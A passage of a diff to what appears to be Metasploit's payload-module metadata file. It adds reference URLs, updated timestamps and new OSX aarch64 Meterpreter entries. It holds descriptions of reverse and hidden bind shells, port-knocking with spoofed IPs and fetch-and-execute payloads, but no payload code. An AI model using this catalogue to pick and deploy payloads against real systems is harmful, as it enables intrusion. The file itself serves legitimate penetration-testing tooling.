    "arch": "cmd",
@@ -201204,7 +202396,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201248,7 +202440,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201294,7 +202486,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201337,7 +202529,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201379,7 +202571,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201423,7 +202615,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201465,7 +202657,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201507,7 +202699,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201549,7 +202741,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201593,7 +202785,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201637,7 +202829,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201682,7 +202874,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201728,7 +202920,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201774,7 +202966,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201817,7 +203009,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -202066,7 +203258,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -202111,7 +203303,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -203026,7 +204218,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from certain IP and spawn a command shell.\nThe shellcode will reply with a RST packet if the connections is not\ncoming from the IP defined in AHOST. This way the port will appear\nas \"closed\" helping us to hide the shellcode.",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -203148,7 +204340,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -203193,7 +204385,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -204030,7 +205222,8 @@
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
-      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
+      "URL-https://github.com/rapid7/ReflectiveDLLInjection",
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -204075,7 +205268,8 @@
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
-      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
+      "URL-https://github.com/rapid7/ReflectiveDLLInjection",
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -206434,7 +207628,7 @@
    ],
    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -206477,7 +207671,7 @@
    ],
    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -206519,7 +207713,7 @@
    ],
    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -206561,7 +207755,7 @@
    ],
    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -206608,7 +207802,7 @@
    ],
    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -206651,7 +207845,7 @@
    ],
    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -206693,7 +207887,7 @@
    ],
    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -206735,7 +207929,7 @@
    ],
    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -206782,7 +207976,7 @@
    ],
    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -206825,7 +208019,7 @@
    ],
    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -210700,7 +211894,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for an IPv6 connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -210743,7 +211937,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -210785,7 +211979,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a pipe connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -210827,7 +212021,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -210874,7 +212068,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -210917,7 +212111,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a connection with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -210959,7 +212153,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -211001,7 +212195,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -211048,7 +212242,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -211091,7 +212285,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -212500,7 +213694,7 @@
    ],
    "description": "Creates an interactive shell using AWS SSM",
    "references": [
-
+      "URL-https://www.sempervictus.com/single-post/once-upon-a-cloudy-air-i-crossed-a-gap-which-wasn-t-there"
    ],
    "platform": "All",
    "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r",
@@ -212508,7 +213702,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-04-18 16:41:48 +0000",
+    "mod_time": "2023-08-01 15:02:11 +0000",
    "path": "/modules/payloads/singles/generic/shell_bind_aws_ssm.rb",
    "is_install_path": true,
    "ref_name": "generic/shell_bind_aws_ssm",
@@ -212803,7 +213997,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-11-10 12:33:52 +0000",
+    "mod_time": "2023-08-09 13:13:15 +0000",
    "path": "/modules/payloads/stagers/java/reverse_http.rb",
    "is_install_path": true,
    "ref_name": "java/meterpreter/reverse_http",
@@ -212844,7 +214038,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-11-10 12:33:52 +0000",
+    "mod_time": "2023-08-09 13:13:15 +0000",
    "path": "/modules/payloads/stagers/java/reverse_https.rb",
    "is_install_path": true,
    "ref_name": "java/meterpreter/reverse_https",
@@ -213077,7 +214271,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_http",
@@ -213115,7 +214309,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_https",
@@ -213153,7 +214347,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_tcp",
@@ -213265,7 +214459,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_http",
@@ -213303,7 +214497,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_https",
@@ -213341,7 +214535,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_tcp",
@@ -213369,7 +214563,7 @@
    ],
    "description": "Listen for a connection and spawn a command shell",
    "references": [
-
+      "URL-https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s"
    ],
    "platform": "Linux",
    "arch": "armbe",
@@ -213377,7 +214571,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/shell_bind_tcp",
@@ -213566,7 +214760,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_http",
@@ -213604,7 +214798,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_https",
@@ -213642,7 +214836,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_tcp",
@@ -213830,7 +215024,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_http",
@@ -213868,7 +215062,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_https",
@@ -213906,7 +215100,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_tcp",
@@ -214021,7 +215215,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_http",
@@ -214059,7 +215253,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_https",
@@ -214097,7 +215291,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_tcp",
@@ -214364,7 +215558,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_http",
@@ -214402,7 +215596,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_https",
@@ -214440,7 +215634,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_tcp",
@@ -214630,7 +215824,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_http",
@@ -214668,7 +215862,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_https",
@@ -214706,7 +215900,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_tcp",
@@ -214960,7 +216154,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_http",
@@ -214998,7 +216192,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_https",
@@ -215036,7 +216230,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_tcp",
@@ -215074,7 +216268,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_http",
@@ -215112,7 +216306,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_https",
@@ -215150,7 +216344,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_tcp",
@@ -215343,7 +216537,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_http",
@@ -215381,7 +216575,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_https",
@@ -215419,7 +216613,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_tcp",
@@ -215707,7 +216901,7 @@
    ],
    "description": "Listen for a connection in a random port and spawn a command shell.\n        Use nmap to discover the open port: 'nmap -sS target -p-'.",
    "references": [
-
+      "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm"
    ],
    "platform": "Linux",
    "arch": "x64",
@@ -215715,7 +216909,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-09-22 12:55:41 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/shell_bind_tcp_random_port",
@@ -217243,7 +218437,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_http",
@@ -217281,7 +218475,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_https",
@@ -217319,7 +218513,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_tcp",
@@ -217593,6 +218787,165 @@
    "payload_type": 1,
    "staged": false
  },
+  "payload_osx/aarch64/meterpreter/reverse_tcp": {
+    "name": "OSX Meterpreter, Reverse TCP Stager",
+    "fullname": "payload/osx/aarch64/meterpreter/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "parchedmind",
+      "nologic",
+      "timwr",
+      "usiegl00"
+    ],
+    "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker",
+    "references": [
+      "URL-https://github.com/CylanceVulnResearch/osx_runbin",
+      "URL-https://github.com/nologic/shellcc"
+    ],
+    "platform": "OSX",
+    "arch": "aarch64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-07-31 20:30:30 +0000",
+    "path": "/modules/payloads/stagers/osx/aarch64/reverse_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "osx/aarch64/meterpreter/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 2,
+    "staged": true,
+    "stage_refname": "osx/aarch64/meterpreter",
+    "stager_refname": "osx/aarch64/reverse_tcp"
+  },
+  "payload_osx/aarch64/meterpreter_reverse_http": {
+    "name": "OSX Meterpreter, Reverse HTTP Inline",
+    "fullname": "payload/osx/aarch64/meterpreter_reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr",
+      "usiegl00"
+    ],
+    "description": "Run the Meterpreter / Mettle server payload (stageless)",
+    "references": [
+
+    ],
+    "platform": "OSX",
+    "arch": "aarch64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-06-19 12:11:18 +0000",
+    "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_http.rb",
+    "is_install_path": true,
+    "ref_name": "osx/aarch64/meterpreter_reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 1,
+    "staged": false
+  },
+  "payload_osx/aarch64/meterpreter_reverse_https": {
+    "name": "OSX Meterpreter, Reverse HTTPS Inline",
+    "fullname": "payload/osx/aarch64/meterpreter_reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
